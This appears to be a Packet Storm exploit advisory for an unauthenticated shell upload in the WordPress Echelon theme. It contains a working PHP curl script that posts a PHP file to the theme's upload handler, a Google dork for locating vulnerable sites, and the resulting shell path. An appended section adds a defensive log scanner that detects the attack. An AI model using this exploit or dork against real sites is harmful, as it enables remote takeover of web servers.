WordPress Echelon Theme Shell Upload

2014-04-25T00:00:00
ID PACKETSTORM:126327
Type packetstorm
Reporter th3rockst3r
Modified 2014-04-25T00:00:00

Description

                                        
`# Exploit Author: Th3 R0cksT3r
# Exploit Title: WordPress Echelon Theme Shell Upload
# Date: 25.04.2014
# Email: th3rockst3r@gmail.com
# Vendor Homepage: http://wordpress.org/
# Google Dork: inurl:/wp-content/themes/echelon/

# Exploit:
==========

<?php
// Local file to send as the multipart upload body
$uploadfile = "file.php";
// Upload handler shipped with the Echelon theme
$ch = curl_init("http://127.0.0.1/wp-content/themes/echelon/lib/admin/functions/media-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// 'orange_themes' is the form field carrying the file
curl_setopt($ch, CURLOPT_POSTFIELDS, array('orange_themes' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
  
  
=========

Shell Access: http://localhost/wp-content/uploads/[years]/[month]/file.php

Greets: Bangladesh Black HAT Hackers  
`
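A defender's check for the two requests this advisory shows (a POST to the theme's `media-upload.php`, then a fetch of a `.php` file under `wp-content/uploads/[years]/[month]/`), as an added example that is not part of the original advisory. It assumes Apache/nginx combined-format access logs; the function name, finding labels and sample log lines are constructed for illustration.

```python
import re
from datetime import datetime

# Paths taken from the advisory: the theme's upload handler and the uploads tree.
UPLOAD_HANDLER = "/wp-content/themes/echelon/lib/admin/functions/media-upload.php"
DROPPED_PHP = re.compile(r"^/wp-content/uploads/\d{4}/\d{2}/[^/?]+\.php(?:[/?]|$)", re.I)
# Apache/nginx "combined" access log format (an assumption about the server).
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

def scan(lines):
    """Return findings as (kind, ip, timestamp, path) tuples, in log order."""
    findings, uploaders = [], {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, path, status = m["ip"], m["path"], int(m["status"])
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        bare = path.split("?", 1)[0]
        if m["method"] == "POST" and bare.lower() == UPLOAD_HANDLER:
            uploaders.setdefault(ip, ts)  # remember the first POST per client
            findings.append(("upload-handler-post", ip, ts, path))
        elif DROPPED_PHP.match(path) and status < 400:
            # PHP served from the uploads tree is suspicious on its own;
            # escalate when the same client posted to the handler earlier.
            prior = uploaders.get(ip)
            kind = "uploaded-php-after-post" if prior and prior <= ts else "php-in-uploads"
            findings.append((kind, ip, ts, path))
    return findings

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [25/Apr/2014:10:01:02 +0000] "POST /wp-content/themes/echelon/lib/admin/functions/media-upload.php HTTP/1.1" 200 41 "-" "curl/7.35.0"',
    '203.0.113.7 - - [25/Apr/2014:10:01:09 +0000] "GET /wp-content/uploads/2014/04/file.php HTTP/1.1" 200 12 "-" "curl/7.35.0"',
    '198.51.100.4 - - [25/Apr/2014:10:02:00 +0000] "GET /wp-content/uploads/2014/04/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [25/Apr/2014:10:03:00 +0000] "GET /wp-content/uploads/2014/03/x.php?c=1 HTTP/1.1" 200 3 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for kind, ip, ts, path in scan(SAMPLE):
        print(f"{ts.isoformat()} {ip} {kind} {path}")
```

Any `php-in-uploads` or `uploaded-php-after-post` finding means the web server executed PHP from the uploads directory, which a stock WordPress media library has no reason to contain.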